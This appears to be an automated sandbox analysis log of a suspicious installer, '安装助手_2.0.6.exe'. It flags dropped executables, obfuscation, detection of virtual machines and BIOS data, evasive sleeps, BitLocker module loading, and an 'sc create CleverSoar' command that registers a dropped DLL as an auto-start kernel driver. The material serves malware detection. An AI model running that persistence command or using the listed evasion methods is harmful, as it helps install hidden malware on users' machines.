Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static file information: File size 5707631 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2140314078.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2140505560.0000000001240000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00B757D0
PE file contains an invalid checksum
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: real checksum: 0x0 should be: 0x57286f
Source: update.vac.6.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr Static PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.6.dr Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.dr Static PE information: real checksum: 0x1eb0f should be: 0xfc66
PE file contains sections with non-standard names
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr Static PE information: section name: .didata
Source: update.vac.2.dr Static PE information: section name: .00cfg
Source: update.vac.2.dr Static PE information: section name: .voltbl
Source: update.vac.2.dr Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr Static PE information: section name: .didata
Source: 7zr.exe.6.dr Static PE information: section name: .sxdata
Source: is-0F5J3.tmp.6.dr Static PE information: section name: .xdata
Source: hrsw.vbc.6.dr Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr Static PE information: section name: .=~
Source: update.vac.6.dr Static PE information: section name: .00cfg
Source: update.vac.6.dr Static PE information: section name: .voltbl
Source: update.vac.6.dr Static PE information: section name: .=~
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA286EB push ecx; ret 6_2_6CA286FE
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8D0F00 push ss; retn 0001h 6_2_6C8D0F0A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF6F10 push eax; ret 6_2_6CAF6F2E
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA5B9F4 push 004AC35Ch; ret 6_2_6CA5BA0E
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF7290 push eax; ret 6_2_6CAF72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF45F4 push 00B9C35Ch; ret 10_2_00AF460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8FB10 push eax; ret 10_2_00B8FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8FE90 push eax; ret 10_2_00B8FEBE
Source: update.vac.2.dr Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.dr Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.dr Static PE information: section name: .=~ entropy: 7.19316283520878
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\hrsw.vbc Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\trash (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe File created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe File created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe File created: C:\Program Files (x86)\Windows NT\tProtect.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\is-0F5J3.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\7zr.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\hrsw.vbc Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac Jump to dropped file
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp System information queried: FirmwareTableInformation Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6310 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3336 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Window / User API: threadDelayed 604 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Window / User API: threadDelayed 567 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Window / User API: threadDelayed 577 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-0F5J3.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\_isetup\_setup64.tmp Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows NT\7zr.exe API coverage: 7.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
